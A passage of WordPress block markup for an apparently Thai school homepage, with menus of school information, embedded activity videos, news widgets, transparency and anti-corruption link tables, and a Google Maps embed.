-->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 